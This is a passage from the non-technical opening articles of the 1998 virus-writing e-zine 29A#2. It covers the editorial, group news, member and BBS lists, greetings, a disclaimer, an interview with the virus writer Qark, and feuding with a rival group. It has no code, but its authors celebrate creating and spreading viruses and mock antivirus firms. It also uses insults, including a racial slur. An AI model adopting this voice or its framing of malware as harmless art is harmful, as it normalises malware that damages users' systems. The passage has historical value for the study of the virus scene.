Introduction to 29A#2 > Mister Sandman/29A

Friday 13th, december of 1996, at 6:66am... 29A#1 is officially released to the public. It was undoubtedly a magic date. But not as magic as friday 13th, which is a special day for viruses, of february, in 1998, at 6:66pm... this was the final release date/time of 29A#2, and the most curious thing is, we had never thought about letting such a coincidence happen... but it did. In this evil year (666*3=1998), who knows what else might happen in the scene?

Over a year has passed since our first issue was released, last december in 1996. However this does not mean, like many people say, that we "release one issue per year". No, that's not fucking true... we've spent one year in order to release 29A#2 but that doesn't mean we will do that again. Lots of circumstances drove us to be late, such as: some members doing the military service, major changes and internal restructuring, and most important of all: the necessity to spend a lot of time on R&D work in order to start the way in the so called "new school" (Win32). It's easy to notice now that, in most of the cases, those who could not understand these reasons were either kids with no necessity of doing the military service (by now) or coders who are still not interested in spending their efforts on Win32. You can find people out there claiming they "release 3 or 4 zines per year, instead of 1", harassing you, making pressure and/or stupid jokes about the reasons which make your zine get delayed, and so on. But the funniest thing is they pay so much attention to your ass that they do not pay any at theirs and then get caught, and it's their zine which gets delayed because of the same reasons they were joking about a few months ago.

Being serious now, it is important to say that making comparisons about quantity is very easy. It is also important to remember tho that YAM, for instance, released three issues in their eight months of life. We are not speaking about quantity, but about quality. And also about content and form, working in a professional way, and offering interesting and innovative articles and viruses to our readers. We do our best and we think it's ok, you judge :)

Like Jacky Qwerty, in a speedtalking, hypergesticulating Tarantino-like way, says, "this second issue of 29A is full of hot new ground-breaking kick-ass stuff from top to bottom" - or that's what we think, it's up to you to tell us whether we're right or wrong at this. However nobody can deny the fact that we have developed for this issue completely new and unseen stuff like, for instance, the new (definitive) Win32 techniques, not only for infection but also for residency, stealth, error handling, etc. We're publishing here as well the hottest disassemblies, engines, tools, tutorials and, of course, viruses of our own, including the first multiprocessor/multiplatform infector, the first virus which executes backwards, the first boot infector that uses PMODE features, the most spread baby in the world right now (CAP), and lots of completely original-featured viruses, which, together with the rest of the articles, we hope you'll read and enjoy.

We hadn't released anything for over a year until this issue of 29A was uploaded to our FTP and eventually made publicly available, and that is something like saying that you'll find the work of a whole year here inside. From now onwards things will change, and we hope we will release our future issues within shorter periods of time. And this will probably mean that, at least for us, "something better than 29A#2" will almost become an oxymoron. However we will try, as it was one of our initial intentions, to make every future issue of 29A better than the previous one(s).

About the scene there's a very important thing to say: it's alive, and it's more active than it has ever been, in my (humble) opinion. Besides the fact that lots of new groups have emerged, which is something that always happens, we can see many important virus groups such as iKx, SLAM, SVL, Stealth, and so on (so on=the ones i've unintentionally forgotten), as well as, for instance, magazines based on external collaborations without any group supporting them, ie Sources of Kaos. As you can see there's a lot of competition and it is pretty obvious that there's still a lot to do in the scene ;)

And i think this is all by now... there is a separate article, called "News since 29A#1", in which we try to describe more or less what has happened in the scene and in 29A as part of it, since our first issue was released. Now it's time just to wish you will enjoy this new issue of 29A, and to ask you not to forget to read any of our articles, we hope you'll like them. "We're pleased if you're pleased" :)
Mister Sandman, bring me a dream.
News since 29A#1 > Mister Sandman/29A

In a whole year it's obvious to say that many things happened. And it would be a real fuck to try to sum them all up in this article, so we'll only try to write a brief report about the most important events which took place in all this time. In fact there's nothing too interesting here, just some kind of curious news which may seem funny or at least not boring to you. For us, they were great and amazing experiences we hope we'll go thru again.

First of all, after the release of 29A#1, was the discovery of some bugs in the article browser and some errors in a few articles. Our first e-zine was just a test and i think it was a pretty good first step. And it meant a big help for us in order to get some experience about magazine releasing. There was as well kind of a "lack of fame", which forced us to be lame in some aspects of the magazine (in the aesthetic side) such as the sucking ANSI i had to draw myself in less than 30 minutes before releasing the zine. Many long conversations about this and other aspects of 29A took place, while our holidays (the VX ones) finished and we had to restart writing viruses. It was nice however to have received tons of e-mails from almost every part of the world congratulating us for the work we did in 29A#1.

We kept on working on our viruses/articles, and at the same time we started thinking about the idea of developing the so-called "29A Labs", our website located at http://29A.islatortuga.com. Also we stopped connecting to EFnet, and, instead, we started visiting the recently founded spanish IRC network, where we eventually settled after having created our own virus channel. And these changes were not only affecting the group externally, but also internally, as by this time there were as well a lot of new members joining, and other members becoming collaborators.

And you may be wondering now what the fuck a collaborator is... well, this is another feature we have implemented in 29A. Now the organization is formed both by members and collaborators. Members are those who have the commitment to write a certain number of articles and/or viruses per a certain period of time; they are 29A, the virus writing group itself. Collaborators are external VXers who don't have any commitment with us, who write articles or viruses when they feel like it, and who send them to us in order to collaborate with the group. It is important to say that many ex-members, due to their inactivity or because of their lack of time, were "reclassified" and put as collaborators, instead of members. So, that's the way the group is formed. The official list of members and collaborators follows, including the last-hour additions :)

IMPORTANT!!! if any of the e-mail addresses below does not work, try to use cryogen.com instead of islatortuga.com, or vice-versa. It is also important to note that we are probably moving in the next months to 29A.org, so these addresses may become obsolete soon, albeit they'll still exist, and we will keep on checking them from time to time.
-29A MEMBERS- (the VX dream-team) ;)

Member name        Origin     IRC nick     E-mail
Mister Sandman     Spain      MrSandman    [email protected]
Darkman            Denmark    _darkman_    [email protected]
GriYo              Spain      GriYo        [email protected]
Jacky Qwerty       Peru       jqwerty      [email protected]
Rajaat             UK         Rajaat       [email protected]
Reptile            Canada     Reptile-     reptile./[email protected]
Super              Spain      Superx       [email protected]
Tcp                Spain      Tcp          [email protected]
Vecna              Brazil     Vecna        [email protected]
Wintermute         Spain      Winter       [email protected]
-COLLABORATORS-

Collaborator name      Origin     IRC nick     E-mail
Aníbal Lecter          Spain      _Anibal_     n/a
AVV                    Spain      avv          [email protected]
Heuristic              Denmark    n/a          n/a
Leugim San             Spain      LeugimSan    [email protected]
Lord Julus             Romania    LordJulus    [email protected]
Mr. White              Spain      W666         [email protected]
"Q" the Misanthrope    USA        n/a          [email protected]
Spanska                France     El_Gato      [email protected]
SSR                    Russia     ssr          n/a
The Slug               Spain      the_slug     [email protected]
VirusBuster            Spain      VirusBust    [email protected]
Ypsilon                Spain      Ypsilon      [email protected]
Z0MBiE                 Russia     Z0MBiE       n/a
Now that this important news has been told, it is time to start reporting the trivial events. I would first mention our appearances in the media. The first one was in PC Revue (?), a slovakian paper-printed magazine, where we could read a brief comment about my AntiCARO virus. After this, we received via Internet an e-mail from a guy called Javier Guerrero, who heads a virus oriented section in a spanish paper-printed magazine called PCmanía. We had some chats about what we (29A+him) exactly wanted, and after that short period of time, a full-color, four-page article about the virus scene and 29A appeared in PCmanía, which is one of the most popular computer magazines in Spain. In the next month, he dedicated another -even longer- article to the analysis of my virus Torero, and two months ago we were mentioned in an article dedicated to virus payloads, as before last summer we had talked with him about the idea of writing such an article, and provided him with some of the most known virus payloads. Besides, we have been interviewed by many other media, and we're waiting right now for more public appearances. These plans include our probable presence in a TV program!, plus the already confirmed announcement of the release of 29A#2 in PCmanía, and some article(s) in another spanish paper-printed computer magazine (the best sold i think), called PC-Actual. But this all is a surprise we would not like to unveil by now... just keep on visiting the 29A Labs! ;)

These are, btw, some excerpts of the article about us in PCmanía:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

On cover: "Exclusive interview to spanish virus creators"

Index: "[...] we offer to you a very interesting interview with two members of a spanish group of virus creators, called 29A. In an informal chat, our guests describe their methods, their history, and their future plans, as well as their opinions about the national and international virus scene".

Page 141: "Nowadays, 29A is, internationally, the most important virus creating group, as well as the first and unique one from Spain".

Page 142: "Writing viruses the way we do in 29A is to code for art and entertainment, not for effectiveness and destruction (Mr.Sandman)".

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
The whole article has also been converted into a webpage, so everybody owning a browser may check it out at the official website of PCmanía, together with other articles 29A was mentioned in:

(*) http://www.canaldinamic.es/PCMANIA/PC057/VI/pc057vivirus0000.html
(*) http://www.canaldinamic.es/PCMANIA/PC058/VI/pc058vivirus0000.html
(*) http://www.canaldinamic.es/PCMANIA/PC061/VI/pc061vivirus0000.html
Another funny event took place last summer, in Madrid. We celebrated the very first european VX meeting, albeit it was initially supposed to be a meeting only for 29Aers. However that's what it eventually became, as most of those VXers who were supposed to come finally couldn't, because of several different reasons. For instance, Rajaat planned to go by car from the UK to Luxembourg, where he'd meet CoKe and then come to Spain. A completely unfortunate last-hour crash the same day he was leaving the UK messed up every plan and made it impossible to meet them... driving while being stoned... you know ;) The only foreigner we could meet was Spanska, from France. After having met everybody we went to a restaurant and had our meal. Then we went for a walk to a cybercafé where we connected to IRC and had some fun on-line, and that is when we decided to split up to meet later in order to go party. Some of us went to the most famous square in Madrid, Plaza Mayor, where we could sit in a bar and try to write a virus together; it was a pretty funny thing albeit we couldn't finish it (too much heat) :) Other people such as GriYo or Spanska decided to go their way in order to have a rest, so they could have their energies on top when going to party. However, this was the last time any of us saw Spanska, he fell asleep in his car until the next day :) We met again at 22:00h or so in a McDonald's, and then went to some pubs and night bars, including GriYo's... and our party stopped around 5:30h or so, with some of us (especially GriYo and i) a little bit drunk :) It was a great experience we'll repeat this summer, first in Madrid and later -hopefully- in Amsterdam. But this time things will be very different, and besides we already know for sure right now that b0z0, Darkman, Reptile, Rajaat, and Spanska are coming, so we are sure it'll be impossible to stop laughing and having fun for a single minute. And there are also some rumors, btw, about the possibility of organizing a ganja-smoking contest so we may know at last who the fuck is the king, god or whatever of ganja ;)

And last but not least, like every year, the SIMO convention (an enterprise-based computer exposition, with stands and so on) took place in Madrid, and 29A couldn't miss it ;) This time it was GriYo, Wintermute, Mr. White (collaborator), and i who represented the group. It was nice to meet personally the developers of Panda, the most important spanish AV product. They were at every moment very kind and proved that it is possible to have a good relationship with "the other side". In this case, it was VX and AV who shared a funny and friendly chat, for some minutes. We could also visit the stands of other AV products, such as F-Prot, AVP, TBAV, Scan, etc, but it was good enough to stop at them and have some laughs... there were only salesmen, so it would have been a waste of time to try to speak with them :P When they saw us laughing at them they became completely astonished :) And this is all, more or less... there's another event about to come, which deals with the celebration of the release of 29A#2, but i guess the report of this party will be part of 29A#3, so... wait until then!
Mister Sandman, bring me a dream.
29A distro sites > Mister Sandman/29A

In order to know the most recent news in 29A, look for our latest releases, and be able to download binaries of our viruses as soon as they're made publicly available, don't hesitate to go visit our "29A Labs", the official website of the group, at http://29A.islatortuga.com. Please note that we're moving soon to http://www.29A.org. However 29A.islatortuga.com will keep on working for a long time until we complete our "migration". If what you want is to chat with us you can always try on IRC, as we usually spend a lot of time in the #virus channel of Hispanet, the spanish network. Connect to one of the servers below and look for us, our nicknames are listed in the "News since 29A#1" article:
Server                        Provider
orion.irc-hispano.org         Arrakis
pleyades.irc-hispano.org      Arrakis
vega.irc-hispano.org          Arrakis
fenix.irc-hispano.org         Arrakis
pegasus.irc-hispano.org       Milenium
saturno.irc-hispano.org       ERGOS
marte.irc-hispano.org         Minorisa
mercurio.irc-hispano.org      Mundiva
ganimedes.irc-hispano.org     EUI UPV
pulsar.irc-hispano.org        RedesTB
gaia.irc-hispano.org          Argo
sirius.irc-hispano.org        Servicom
europa.irc-hispano.org        CTV
aire.irc-hispano.org          Catalunya.Net
titan.irc-hispano.org         InforEspaña
jupiter.irc-hispano.org       Lleida Networks
Since 29A#1 was released many sites (both webs and boards) showed their interest in officially distributing 29A. If you want to join the list of 29A distribution sites, just e-mail either Darkman or me (you can find our addresses in the "News since 29A#1" article) and specify in your message: the name of your website/board and its address/phone number. And then you'll appear in the following list, when updated:
Web site/Board name               Address/Phone
29A Labs (world hq)               http://29A.islatortuga.com
Cicatrix site (usa hq)            http://www.cyberstation.net/~cicatrix
SiZiF's site (.yu hq)             http://solair.eunet.yu/~sizif/29A.html
Dejanu's site (.ro hq)            http://www.rotravel.com/dejanu/29A/
Arrested Development (euro hq)    +31-773-547477
Black Adder (.il hq)              +972-651-4404
BlueDemon BBS (.mx hq)            +52-461-555-19
Dark Node (.es hq)                +34-(9)86-564-053
Edison's Temple                   +34-(9)1-406-03-72
FaLCoN BBS (.br hq)               +55-11-875-9838
IX BBS (.de hq)                   +49-6074-68390
Satanic Brain (.ar hq)            +54-13-837480
The Frynge (.ca hq)               +1-604-763-6314
Toxic Delusions (.za hq)          +27-24-852-5008
UiS (.my hq)                      +60-352-107-72
Due to a data loss at least 2-3 sites couldn't be added, as it was impossible to recontact them in order to get their data again. We in the staff hope they're reading this and will then get in touch again.
Mister Sandman, bring me a dream.
Our greetings > Mister Sandman/29A

Greetings go this time to... _Anibal_, 00FAh, avv, b0z0, CaptZero, Casio, Cicatrix, CoKe, FJP, Galar, Galindo, giGGler, God@rky, Greenline, iiriv, Int13h, jtr, kdkd-666, Kid_Chaos, LeugimSan, LordJulus, LovinGOD, LuisM, Maverick, MDriller, mgl, Murkry, nick, Omega666, Owl[FS], Pedro, piCarD, Poltergst, "Q", qark, QuantumG, rretch, RAIDERS, rebyc, ROLF, sbringer, ShadSeek, Shumway, SiZiF, Skeeve242, Sokrates, Spanska, SSR, StarZer0, the_slug, TheWizard, trgvalkie, VDaemon, VirusBust.

we miss your great sense of humour on IRC ;) still translating games into spanish for EA? :P so happy you finally got a girlfriend :) hope the fuckin t-shirt arrives soon... yours rocks ;) why are people like you so motherfucking anal? learn and sing Madonna's "Like A Virgin" :P keep the *best* work up, man, you rule! your computer is now stoned (same as you, heh) you're an incult, Daft Punk roqs ;) not drunk anymore, girlfriend... really Galar? ;) is your height still 81cms? (greeting from Super) we all live in a love chaaat! -> R's ruin, hehe miss you and your cool website :( how are you? still alive? (in Romanian) yodel again! :) so long no see, dude learn cheli and win a prize ;) we all are happy you're ok again what about your life, man??? i really miss you :( jqwerty+you+me=latin sex machines! hope to see you this summer in Madrid ;) still working on that cookie monster? vindecatori roq!!! :))) i promised you'll be here... so here it is :) the OS-migration man, hehehe ;) Universe+Orgasmatron rulez (greeting from Vecna) forget DOS and get into the new school :P greetings are the most important section ;) hope to see you more often on IRC wanna send greetings to your gramma? :) hope you and your BBS are still alive :) thinking on the anti[sm] coalition? how many RedBulls have you drunk tonite? (Super) don't get too stoned when you come to Spain ;) espressos and cappuccinos rule, heh? what must you do to convince people? be back... (666th time somebody asks you) still interested in Linux stuff? love that crazy dutch radio reporter ;) you look like a whale fetus, cocksucker!!! (in Spanish) really getting a paid travel to Acapulco? forgot what IRC stands for? :) greetings because of being GriYo's inspiration what can i say to one of my idols? you should come more to Hispanet ;) more gypsies working at Tabacalera? :) i promised i'd send that to you... ;) becoming a millionaire with your AV? ;) don't even think on speaking about exams! ;) still lost in Madrid? :P russkaya viruskaya energya!!! ;) i'm working on a GameBoy infector, hehe ;) aaaarrggghhh, the $#%!@ military service use a debugger instead of cut&paste :P does this seem good enough to you? try to spice some horse up with Avecrem :) heh, third greeting in Romanian :) happy being the "keeper of the virii"? ;)
W666: what about that movie you were writing?
ww0rker: still married as far as i know... that's a record!
Ypsilon: you start looking serious, but keep on coding! :P
Z0MBiE: what will get infected next? txt? :)
Reptile's greetings... oYirG, b0z0, Kid_Chaos, piCarD, Reptile, Scorpion, retch.

schizo! change nick! got the shirt? :P fascist Fujimori sucks badly! mooha! ;) bwaha! rhabarber... *** You were kicked from #virus by blah0 (banned) Hey you gimp, is it fun to work in a dungeon?! You hermaphrodizeeen bitch! Stupid fascist!
Rajaat also wants to greet: Rhincewind, The Unforgiven, Antigen, Priest, and Metabolis, hoping to recontact them in the near future. We would also like to send special greetings to Javier Guerrero (thanks for all, man!), Bernardo Quintero (great work coming soon heh?), our friends at Panda Software (eat this!!! :P), and of course, to all our buddies at #hack in Hispanet, especially: BINARIA, DarkNail, mainboard (also his girlfriend, Icar) and Case_Zer0 (the ones i go out with more often in Madrid), also to PhiSk, for his loyalty and a big favor i still owe, La_Santa (heheh, my cyberwife) and to my best friends there (or at least, those ones i can remember right now - alphabetical order): _TaNiS_, |AkratA|, |AmandA|, |aRuSHa|, |fit0|, Akira, BiLLsUcKs, Clarisita, dairo, deadrose, Goku, Jany, Mia (welcome to Jack Rabbit Slim's) ;) NecronoiD, RAGE_666, SiLbY, Sr-aSpid and VaW (not a #hack addict tho). If you are not included here, don't think you are less important than the above for us... sometimes we even forget ourselves!
Thanks to... Exobit, Artqvo, Khroma, Mentat, Tcp, The Slug, Tuk, Spanska.

democoding group who programmed the intro; ANSI logo and graphics of the intro (Exobit); main writing of the intro code (Exobit); music modules of the intro (Exobit); file browser coding, configuration, bug fixes; article reader coding, bug fixes; 29A official logo, used in intro and ANSI screensaver, based on his Cosmos virus.
Mister Sandman, bring me a dream.
Legal stuff > Mister Sandman/29A

Not many changes since 29A#1 so... eat more or less the same text :P Erhhhmm... well, i really hate to do this kind of thing but it's necessary anyway so... ok, let's suffer a bit to make my lawyers happy :) Albeit most of our readers are supposed to have more than one virus, and to be even able to code viruses by themselves, so they ain't the typical lamers who are looking for destructive code in order to fuck some computers at the school they "study" in, we are conscious about the fact that there exists a little and very improbable risk of falling into the greasy hands of one of these gimps, so we'd like to make clear that the only reason which drives 29A to release this magazine is the basic principle of educational purposes. As Qark said, "if we don't hurt the community, community won't hurt us" ;) We are not responsible for any damage caused due to the misuse of the information (articles/viruses) released in this issue of 29A, just the same as somebody who makes knives isn't responsible if some schizo uses one of the knives to kill another person or to cut his dick off, got what we mean? If so, go ahead and enjoy the magazine. Otherwise just get the fuck out :)
Mister Sandman, bring me a dream.
Interview with Qark > Mister Sandman/29A

For this second issue of 29A, we decided to interview Qark, one of the best virus writers ever (maybe the best?), who left VLAD and the scene about one year ago. Despite his lack of free time, this very good friend of mine was eventually able to make it possible to bring you now this great opportunity to know him better. We all miss you, dude.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

29A> Ok, Qark... this is the classic first question of almost every interview... tell me why did you choose your nick

When Metabolis and I started out with VLAD we had local scene nicks that everyone knew, so we had to get new ones. (Obviously meta wasn't always called meta). When I first jumped into irc for #virus, every nick I picked was always taken, so I thought to myself "What nick could I possibly pick that no one will ever use?", and picked Qark - because it defies the laws of English by dropping the 'u'. But why "Qark" out of all the "Q" words? I don't know.. I can't think of any other "Q" words to be honest.

29A> When and with 'what' did you start computing?

I didn't own a computer until after I left highschool. (A few years back). My first computer was a mighty 8088 XT with 20 Meg hard disk and EGA monitor :)

29A> And when did you first know about a computer virus (first experience, with which virus(es), etc)?

The first I ever heard about computer viruses was when TZ's X-Fungus virus infected Suncorp (a local bank) on the radio. The first virus I ever encountered in the flesh was 1575 (green caterpillar) on someone's computer. I took a copy home so that I could work out how to make a virus of my own but it was beyond me at the time.

29A> In what computer languages can you code?

ASM, PAS, SQL, Modula-2 and some C.

29A> Describe yourself (physically, morally... however... even sexually if you dare) :)

Umm White, Male, average height, brown hair, blue-green-hazel (something) eyes. I'm very conservative morally - viruses are a bit of an anomaly in my personality.

29A> Ok, now about viruses... tell me which ones have you coded, and/or the ones you like most

Let me see.. I've written a whole heap of viruses.

Father, Mother, Sister, Brother (Incest family - Very lame) - VLAD#1. Actually mother wasn't too bad. It still stealths everything.
VLAD virus, Republic, Meningitis - VLAD#2. Pretty lame still, although my flash bios infector was a nifty idea.
Hemlock, Megastealth - VLAD#3. Both these viruses were pretty cool even if somewhat buggy.
Winsurfer, Goodtimes - VLAD#4. Winsurfer was a big breakthrough for Quantum and I so it is one of my favourite virii.
Horsa, Ph33r - VLAD#5. I liked both of these virii. Horsa was one of the hardest things I've ever written due to the mathematics involved so I like it, and Ph33r is the first multi-OS (kind of) virus so I liked it too. (Quantum wrote the memory routines for that one)
Gilgamesh, tracevir, 386 virus - VLAD#6. Pretty ordinary viruses, but my VSTE (my file entry point tunneling engine) was a new concept so I kind of liked it, even if it has been done better since.
Padania, goodbye - VLAD#7. Padania was good. Goodbye sucked.

Quantum and I have worked on a couple of Win95 viruses together. Win95.Punch and one in memory of TZ..

29A> Btw, about VLAD (unavoidable question) :) you left the group... you said you didn't have the time for doing other things... explain it better, please... did you get a girlfriend? :)

By "other things" I meant "anything". Spend your time vladding and the rest of your life goes to hell. And I do have a lovely woman who takes up a sizeable chunk of my time :) luckily for me she likes viruses :)

29A> What about your personal future projects?

Some more win95 viruses are on the cards. I did the vxd routines in a couple of win95 viruses so I'm still coding every now and then..

29A> And more thingies about VLAD... could you tell me something about its story (who, when, why decided to create it, etc)?

I'm pretty vague about it, but I think it went like this: Meta read ir#2 and thought "cool, I'm gonna start my own virus group and call it vlad". At this stage I didn't know him at all. A day later he was chatting to the sysop of the local warez board about his latest group when he was put in touch with me. And voila, that's how it started. Meta had his own shareware bbs where he was the good-guy sysop, while in a secret area was the vlad virus section. There we would swap code for our latest direct-action virii :) When we got enough dross ready to produce vlad1 I jumped on the bus and the train and went out to his place to put it all together. We met for the first time at the train station. Nothing much happened at his place apart from the magazine production. The main thing I remember is it being freezing cold.. we were working on it until the early hours of the morning. Somewhere along the track meta met TZ and invited him to our private vlad conference on his bbs. We'd discuss virii techniques.. Sometime later we went onto IRC and our story is well known since then..

29A> Which is/are your favourite virus(es)?

RDA.fighter is probably my favourite, followed by starship. The new virus by Quantum and I is really cool :) coming to a hard disk near you :)

29A> Do you think the perfect virus exists or might be ever coded?

No.. the whole idea of a perfect virus is stupid I think.

29A> How will the 'viruses of the future' look in your opinion?

It will be a resident win95/NT infector.

29A> Ok, now let's have a look at the other side... AVs and AVers. Which is the AV you like most?

AVP is pretty good. Its win95 version really needs a scanning VXD though.

29A> Heh... one question is enough for those niggas ;) now about the virus scene... give me your point of view about it (old groups, new groups, who's cool, who sucks... you know) :)

Firstly, VLAD is cool :) Nuke, rabid and yam were all lame.. but trident and p/s were good. IR were always my favourite group but I don't like IRG much.. 29A are way cool :)

29A> Finally, just send a greet to someone, say something, sing, write a poem, pull yourself :)... dunno, whatever you want. This is your free space :)

RIP TZ :( Greets fly out to Metabolis and Quantumg and all the people I like. Also a kiss to a certain girl :)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

Good luck, Qark... especially with that girl ;)
Mister Sandman, bring me a dream.
Words from Jacky Qwerty > Jacky Qwerty/29A First of all, i
would like to send some short comentz and general greetz to the
good and bad virus scene. Yes, i think there exists such diference
and thats something that should be "pointed" out. Apart from this
i'll take the chance to describe my articlez, virusez and utilitiez
included in this 29A issue as well as my true purpose on writin and
spreadin out this knowledge.
The two sidez of virus scene

Yes, in my humble opinion, i think
there is a "good" virus scene, one which is continuosly lookin for
new infection ideaz, new platformz and new file formatz to infect.
Just for the simple chalenge it poses by itself, not for that
stupid nonsense apetite for destruction. Thats childish rubish and
we dont like that. We rather enjoy foolin F-Potatoe's last
protection or TBAV heuristicz or discoverin Microsoft's untold
secretz, etc. This is what we like. This is the good virus scene
and we'll stay this way for a long time. The other side is the
"bad" virus scene, which is made of vandalz who have childish
programin habitz. They move and act by the simple "minimum effort"
principle. They rather enjoy randomly writin or formatin a hard
drive, than squeezin both skull and brainz out in an atempt to code
some more creative and interestin stuff, not the awful boresome
shit they're acustomed to. For the former purpose, i'd strongly
recomend to download the AVP enciclopedia DOS edition, and take a
look at all the "kick ass" virus demoz it containz. Needless to
say, I, as a VXer and member of the 29A group team, have nothin to
do with this "bad" side of the virus scene and be sure i will
reject any chance to become a "vandal" for dayz to come. Did u
stick that Bontchy! #8P
Greetz to all VXerz

Warm greetz to all those creative VX coderz
around the world who use their brainz and imagination writin fancy
creative payloadz - harmless graphicz, soundz, etc - inside their
lil' creepy binary creaturez, you all rock! ;) No greetz at all to
the increasin number of lamerz and wannabeez who feel they are the
bad guyz and best coderz on earth just by writin destructive
nonsense rubish and wipin out compz at skool or friendz, you all
suck! :( As bein part of the first group, i really hope you enjoy
this 29A#2 isue as it is full of hot new ground-breakin kick-ass
stuff from top to bottom ;)
Quick description

For my part i have writen and coded some nifty
Win32 (WinNT/Win95/Win32s) virusez: (1) Win32.Jacky, the very first
Win32 infector. (2) Win32.Cabanas, the very first resident,
stealth, antidebuged, antiheuristic Win32 virus. (3) DogPaw, a
simple but powerful DOS virus, which is able to infect DOS, Win3.1,
Win95, WinNT and OS/2 aplicationz via a recently discovered
backdoor, thanx Casio. (4) WM.CAP, my first and only macro virus
writen as an entrance to the macro stuff world, simple in structure
(who said complex?), but very powerful and infectious by nature -
heck i didnt know it would become so comon, blame Microsoft for
their stupidity -. This is all with respect to my virusez. I have
also prepared a couple of articlez about macro stuff, they are
named (1) Macro virus tricks, and (2) WordMacro.CAP virus
description. The first
article deals with two known limitationz with actual macro
virusez and then proposes solutionz for them. The second article
gives a full description of a real macro virus and serves as a good
compliment for the first article. Finally, i have writen two
especially useful utilitiez for Win32 (with C source code
included): (1) GETPROC, a Win32 console aplication very useful for
beginerz, which also serves as a compliment for the PE infection
tutorial. And (2) PEWRSEC, a simple DOS program which will be very
useful for you Win32 ASM coderz once you understand the benefitz of
a R/W code section on a PE file: you will be able to include the
first generation sample of your Win32 virus in the code section, as
you usually did in DOS, and you will also be able to debug it with
symbolic information included along with the source code. And last
but not least, i have prepared myself some useful INC filez for DOS
and Win32: (1) USEFUL.inc, (2) MZ.inc, (3) WIN32API.inc and (4)
PE.inc. This include filez will make more sense once u have delved
yerself into the Win32 world.
Scope and Purpose

All of these virusez/articlez/utilitiez were
all coded with just one goal in mind: to make sure all this
information will be given to "otherz" before i leave the scene or
the world at worst. I mean, dont let your own knowledge be buried
along with your body, spread it out before you leave this world. If
you're smart enough and really understand this, then you are almost
ready to learn from otherz. Next is that you should be moved or
pushed to "learn" just by the simple educational purpose or the
chalenge it poses by itself. Then you'll be ready to teach your
knowledge and otherz will learn from you. Needless to say, i
wouldnt like at all to know that one of my virusez has escaped from
this zine coz you didnt understand this. Please dont be a lamer.
Now, Enjoy! (c) 1997 Jacky Qwerty/29A.
What is happening in IR/G? > Rajaat / 29A

Now talking Rajaat [IR/G]...
Preface

It has now been half a year since our magazine got
out, and since then you haven't heard much from us anymore... Why?
I hope to cover some of the things that happened in IR/G and what
the current status is (as far as I know, that is).
Sepultura's departure

Shortly after the release of IR#8
Sepultura, our main organizer and backbone of IR/G decided to leave
the scene altogether. I do miss his programming skills that I don't
have. Although I don't blame him, his departure was in my eyes the
beginning of the end of IR/G as I know it. I hereby want to thank
him for all the things he has done for me and for IR/G.
No backbone

With the departure of Sepultura we also lost our
talent to organise. Without this backbone, we weren't able to bring
out any magazine after IR#8. We tried to find another person in our
group with the ability and will to organise, yet we couldn't
find/trick someone into taking that task upon him. Without any
organisation, a group cannot be in my view.
Hate to code

Not being motivated very much, I found myself
unable to program very much. My time being consumed by college I
had a little time to research virus-related issues. All I could do
is think of nice tricks, program them and comment them a bit, but I
could not find the heart to make a total virus for it. This left me
with a huge pack of tricks, which I haven't used in viruses yet.
Eventually I hope I can find the motivation and time to put all
these tricks together in one big virus, which will probably be my
last virus I will make. This is not caused by a lack of interest,
and of course I will stay in the scene trying to think of new
tricks and innovate ideas.
Prologue

Due to the circumstances and the overall quality of the
viruses produced by IR/G I think it suits me and them best that I
leave the group and continue the path of virus writing on myself,
contributing things to various groups. I hope that the other people
in IR/G won't be mad about my decision to leave them. I wish them
all the best, and hereby my promise that this is not the last time
they will hear from me.
Thanks

Given the opportunity here I would like to thank quite a
few people who have supported me in the past and hopefully will
stay to do so in the future. The Unforgiven, for his many email
conversations, excellent ideas on human nature and beliefs, and,
most importantly his friendship during the time. I hope I will be
able to meet you sometime. Rogue, for showing his excellent
code examples, although I've never witnessed any program of him
finished in the wild, save for one. Most probably a badass to other
but a friend to me. Mister Sandman, to whom I gave this article in
order to publish it in their second magazine (they beat us *grin*).
Sepultura, for his organising skills and trying to keep the whole
lot together. I could thank a lot more people, but I think that I
must keep it short, because nobody is interested in it save for the
people who are actually thanked.
And now talking Rajaat / 29A...
Last update

It sure looks like that when I write some article,
it always seems to get outdated when magazines don't get released
as quickly as anticipated (sorry folks, couldn't resist joking
about it). But since the time I wrote the upper a few things
happened. You probably have read now somewhere in this magazine
that I've become a member of 29A! My hate to code went away but
that doesn't mean I've plenty of times to code, but I'll do my best
and see what I can have in store for you.
What the hell am I up to?

To be honest, I don't know. I have
here about 5 unfinished programming projects I should finish soon,
and I hope I will have the time at my disposal for finishing them.
Anyway, I'm proud to be a 29Aer and I hope I can keep up the
group's high standard of virus coding.
And how about Immortal Riot?

I wish I knew, I think the best
thing my friend The Unforgiven and his comrades can do is split
from Genesis again (in my eyes it's history) and go on their own
again, should they feel like coding again. I hope that you, the
reader, will once again witness the excellent magazines of our
"hjältar i snön" (heroes in the snow).
Rajaat / 29A
Envy makes dorks resuscitate > Mister Sandman/29A

It has
passed one year or so since IRG#8 (actually IRG#1, but many people
seem to think with their ass) was released. And happily that's the
last time we had the chance to hear about a pampered child whose
protagonism and egocentrism desire reached its real highlight. You
know who he is. He retired because he "did not have enough time to
keep on leading IRG", as school sucked most of his free time.
Well... for a long time we were almost forced to swallow his
childish attitude, his deic-wannabe behavior, and his lots of
attempts to suck the whole attention everytime, everywhere (haven't
you ever hated to read his stupid introductions to somebody else's
articles published in IRG#8?). And we had to read BULLSHIT like
this from him:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...] The magazine is about 1.4 meg, of which about 99% is actual
articles. Unlike some 'virus' magazines we dont need 500k viewers /
intros / music files to impress.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
A pretty modest boy, heh??? but that's not all. Besides this, we
all in the virus scene had to stand him claiming "IRG#8 is the best
zine about viruses ever released", being that a real offense to
VLAD and the great work they did during their presence in the
scene. Now it is when we all realise about why this boy i'm talking
about is so "well appreciated" among most of the mentally sane and
concious-of-what-they-say virus writers. Fortunately he retired and
left the scene. IRG died. And we all lived much better since that
happened, as we had to stand no longer any motherfucking candy
eater telling us shit about how cool he was. While he was
comfortably pulling himself home, we all were happily having a good
run of things in the virus scene. In fact everything was going
almost perfect. But you know perfection does not exist. And that's
why he briefly reappeared by june/july of this year, using other
nick and apparently trying to hide his previous identity, and to
dazzle the scene with a new virus he had written. This virus was
released via IRC (as far as i know) within a ZIP file which
